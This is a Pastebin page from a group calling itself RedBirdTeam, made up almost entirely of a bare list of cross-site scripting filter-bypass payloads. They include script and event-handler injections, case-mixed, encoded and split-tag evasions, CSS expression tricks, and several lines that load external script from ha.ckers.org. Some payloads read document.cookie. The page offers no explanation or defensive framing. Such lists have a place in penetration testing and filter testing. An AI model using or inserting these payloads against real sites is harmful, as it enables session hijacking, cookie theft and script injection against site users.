Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- __ __ _____ _____
- \ \ / // ____/ ____|
- \ V /| (___| (___
- > < \___ \\___ \ [RedBirdTeam]
- / . \ ____) |___) |
- _____ __ / / \_\_____/_____/ _____ _____
- | __ \ /\\ \ / / | / _ \ /\ | __ \ / ____| <script>alert(/Payloads XSS Filter Bypass List/)</script>
- | |__) / \\ \_/ /| | | | | | / \ | | | | (___
- | ___/ /\ \\ / | | | | | |/ /\ \ | | | |\___ \
- | | / ____ \| | | |___| |_| / ____ \| |__| |____) |
- |_| /_/ \_\_| |______\___/_/ \_\_____/|_____/
- [byt3]
- ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
- '';!--"<XSS>=&{()}
- 0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
- <script/src=data:,alert()>
- <marquee/onstart=alert()>
- <video/poster/onerror=alert()>
- <isindex/autofocus/onfocus=alert()>
- <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
- <IMG SRC="javascript:alert('XSS');">
- <IMG SRC=javascript:alert('XSS')>
- <IMG SRC=JaVaScRiPt:alert('XSS')>
- <IMG SRC=javascript:alert("XSS")>
- <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
- <a onmouseover="alert(document.cookie)">xxs link</a>
- <a onmouseover=alert(document.cookie)>xxs link</a>
- <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
- <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
- <IMG SRC=# onmouseover="alert('xxs')">
- <IMG SRC= onmouseover="alert('xxs')">
- <IMG onmouseover="alert('xxs')">
- <IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
- <IMG SRC=javascript:alert(
- 'XSS')>
- <IMG SRC=javascript:a&
- #0000108ert('XSS')>
- <IMG SRC=javascript:alert('XSS')>
- <IMG SRC="jav ascript:alert('XSS');">
- <IMG SRC="jav	ascript:alert('XSS');">
- <IMG SRC="jav
ascript:alert('XSS');">
- <IMG SRC="jav
ascript:alert('XSS');">
- <IMG SRC="  javascript:alert('XSS');">
- <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
- <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <<SCRIPT>alert("XSS");//<</SCRIPT>
- <SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
- <SCRIPT SRC=//ha.ckers.org/.j>
- <IMG SRC="javascript:alert('XSS')"
- <iframe src=http://ha.ckers.org/scriptlet.html <
- \";alert('XSS');//
- </script><script>alert('XSS');</script>
- </TITLE><SCRIPT>alert("XSS");</SCRIPT>
- <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
- <BODY BACKGROUND="javascript:alert('XSS')">
- <IMG DYNSRC="javascript:alert('XSS')">
- <IMG LOWSRC="javascript:alert('XSS')">
- <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
- <IMG SRC='vbscript:msgbox("XSS")'>
- <IMG SRC="livescript:[code]">
- <BODY ONLOAD=alert('XSS')>
- <BGSOUND SRC="javascript:alert('XSS');">
- <BR SIZE="&{alert('XSS')}">
- <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
- <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
- <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
- <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
- <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
- <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
- <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
- exp/*<A STYLE='no\xss:noxss("*//*");
- xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
- <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
- <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
- <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
- <XSS STYLE="xss:expression(alert('XSS'))">
- <XSS STYLE="behavior: url(xss.htc);">
- ¼script¾alert(¢XSS¢)¼/script¾
- <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
- <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
- <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
- <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
- <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
- <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
- <TABLE BACKGROUND="javascript:alert('XSS')">
- <TABLE><TD BACKGROUND="javascript:alert('XSS')">
- <DIV STYLE="background-image: url(javascript:alert('XSS'))">
- <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
- <DIV STYLE="background-image: url(javascript:alert('XSS'))">
- <DIV STYLE="width: expression(alert('XSS'));">
- <!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
- <BASE HREF="javascript:alert('XSS');//">
- <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
- <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
- <? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
- <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
- <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
- <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
- <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <A HREF="http://66.102.7.147/">XSS</A>
- 0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-"
- veris-->group<svg/onload=alert(/XSS/)//
- #"><img src=M onerror=alert('XSS');>
- element[attribute='<img src=x onerror=alert('XSS');>
- [<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ]
- %22;alert%28%27RVRSH3LL_XSS%29//
- javascript:alert%281%29;
- <w contenteditable id=x onfocus=alert()>
- alert;pg("XSS")
- <svg/onload=%26%23097lert%26lpar;1337)>
- <script>for((i)in(self))eval(i)(1)</script>
- <scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>
- <sCR<script>iPt>alert(1)</SCr</script>IPt>
- <a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">test</a>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement